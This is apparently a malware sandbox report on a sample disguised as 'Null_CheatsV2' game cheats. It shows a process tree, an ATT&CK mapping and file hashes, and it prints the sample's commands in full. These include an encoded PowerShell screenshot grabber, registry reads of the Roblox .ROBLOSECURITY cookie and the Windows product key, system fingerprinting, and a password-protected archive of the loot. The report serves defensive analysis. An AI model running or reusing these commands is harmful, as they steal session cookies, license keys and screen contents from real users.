LgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2088
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iptpxtbo\iptpxtbo.cmdline"
        5⤵
        
        PID:3448
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C13.tmp" "c:\Users\Admin\AppData\Local\Temp\iptpxtbo\CSCA1D426AD1EF3493A96DDBCFBAED5321.TMP"
        6⤵
        
        PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4756
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2476
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:648
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2144
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19882\rar.exe a -r -hp"Null123" "C:\Users\Admin\AppData\Local\Temp\amsSX.zip" *"
    3⤵
    PID:2500
  - - C:\Users\Admin\AppData\Local\Temp\_MEI19882\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI19882\rar.exe a -r -hp"Null123" "C:\Users\Admin\AppData\Local\Temp\amsSX.zip" *
      4⤵
      Executes dropped EXE
      PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4904

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2092

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:3616
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4160
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2004 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 23839 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9b2761a-f30b-49fd-a428-dba730b6bded} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" gpu
    3⤵
    PID:3012
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2400 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a98b4e65-43d2-4808-9d16-7062e7232c7c} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" socket
    3⤵
    PID:1112
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 3028 -prefMapHandle 2820 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35da0252-90d6-4d79-bba4-e4f3cd2049b6} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:460
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3900 -childID 2 -isForBrowser -prefsHandle 3884 -prefMapHandle 3144 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24654b1c-dadc-4c65-bf7e-6491b27c4113} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:636
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4552 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4628 -prefMapHandle 4592 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d15b58d-b498-44f2-b9d9-a4693c4b0209} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" utility
    3⤵
    - Checks processor information in registry
    PID:4528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5432 -childID 3 -isForBrowser -prefsHandle 5424 -prefMapHandle 5420 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c401689-532f-486a-9808-9f0b5371da09} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:2584
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5672 -childID 4 -isForBrowser -prefsHandle 5584 -prefMapHandle 5592 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd959c45-6016-4398-9e50-4f21fcea1dfd} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:4544
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5860 -childID 5 -isForBrowser -prefsHandle 5776 -prefMapHandle 5784 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {651acd64-5915-49a7-ab31-6bd322a80fdb} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:4572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6304 -childID 6 -isForBrowser -prefsHandle 6292 -prefMapHandle 6280 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {740ee691-ceb1-443f-ad8b-361f9982c457} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:4036
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6740 -childID 7 -isForBrowser -prefsHandle 6420 -prefMapHandle 6500 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb091918-3646-4ea4-84ee-bfe106d05dbf} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:1684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6964 -childID 8 -isForBrowser -prefsHandle 6796 -prefMapHandle 6968 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a10bd07f-b52f-4e51-8c3a-72c80e66efac} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:4764
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6216 -childID 9 -isForBrowser -prefsHandle 6204 -prefMapHandle 4208 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ea8d817-be8e-4615-921d-7b5deaa790e4} 4160 "\\.\pipe\gecko-crash-server-pipe.4160" tab
    3⤵
    PID:4116

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap22818:84:7zEvent3337 -ad -saa -- "C:\Users\Admin\Desktop\Null_CheatsV2"
1⤵
- Suspicious use of FindShellTrayWindow
PID:1012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
e8a95a33bdaa8522f9465fd024c3ec88

SHA1
45c15dbb8ab99be8e813aee1ed3e21ad334c8745

SHA256
06abbf9cccdf6557b1f616e0c9214c580f1d2be928104a0c8193c2217dd98c1b

SHA512
c429d8d5bfba8790a725e9d6eed656b93e69bfa8290ca388cf007aeb82462db39539ce5da4ab00c19e795344119ab14cef915c39503da80a69953e0e2ee2a002

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
df0d1d2d624d3ca383f541fc2c87eec9

SHA1
811e86001dd633a86d59f73a212f0b30662bf445

SHA256
5aa8cbd458648c8c7f5d4ac5597719298059eaa604280fa8b2e98e1bbbb31e47

SHA512
046c0b55ce12a4564a9f0040232df2c0c876d9a470970e007325f139657959b4f53659bcd7b8fa7678ba25cd9f9c4b648d43ad9d20e221bd393525b7cdbbf8d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
90d696d6a8ab185c1546b111fa208281

SHA1
b0ce1efde1dad3d65f7a78d1f6467d8a1090d659

SHA256
78497ed2c4ccac6e870afc80224724f45a7356bde55580a5c6ea52ef5079a3f4

SHA512
0a19628ae31ec31f382b3fd430c205a39985730e12c608b66b83ee4826e3f3fc9f4a034e03f38ac5260defdf805b927528ffca1a2ccdd59d9bfe05822923c4ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1cce848e0d949413e220b4aba04a6363

SHA1
dd8489f2dae67091d0dbf7dc4a94893d6d31d612

SHA256
b67756d9ac981a673b55fb912f35f5badb6ffe0c908ef93ee90d50df01f4192b

SHA512
5816f9e16df84e997c96495ca566d2897625b99a8771b21333e114f95fc1aaf8b053370708b5d4d6fcde343bcd2c0ac30fd1dc4e36c7e123ff59a15be32176fe

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\activity-stream.discovery_stream.json

Filesize
21KB

MD5
081256f293017d6613db347ab7e3a750

SHA1
416746ff780b9084e631d1fe2c2e4dd1a7e862dc

SHA256
e88512fac5f542cf41c1e8104aca6fe025b5df43323829c348879038a191ff2c

SHA512
9d39e913c4873dc341adb49fafca3955c75181c9e8357a7b3a9c597e3a5aff27cd358ce793120fab8ad71785f097aab1842ca821815e2660ae996e134eb08f3c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\cache2\entries\24B72039547E795E3A3EA01DF87CB4255F2B0C2E

Filesize
261KB

MD5
f34e289a07cab8a712657bea89f9deca

SHA1
eda8295390eb7cc934478f868c221c353d624918

SHA256
f465d44524b36620fd2b06208144414c46ab601c629e7e34f12c76ba73caeaa9

SHA512
c0572a51584f492b7992eb0e625dd750572071eb27c9a2eb40c20a3ae843d1e38a82456fd7b629fcdfb7f01b2b59d85fa87a36a8cdaddba3556c3b6e31580087

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\cache2\entries\31ABF57242CCF801279C59F56D084DEA2BAB3AC3

Filesize
34KB

MD5
c0d788274e6e2c0eac11c5f9c6991d07

SHA1
3e463120e8f905c48b93955eb5aeb34c776615ad

SHA256
1020ae7d9742ef4254a5e7926451da5901490aa2f43db078bffaba134ecbee1e

SHA512
5ed738f9f51fe54151a25a9aedb1a278cc9065715ff56343fe4443382316060b55db6811acee036e9991f74845f514f32d6323905a9e63dceb87d3901c37c401

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\kx4f0sbu.default-release\cache2\entries\489DF8E1F9AF5F8950358CDDDA89CCE2BF64139F

Filesize
44KB

MD5
d057aaf658ad344755aa721f2f19ba3f

SHA1
f1d142f31e892405ac5e94b4691c9f63c6896e12

SHA256
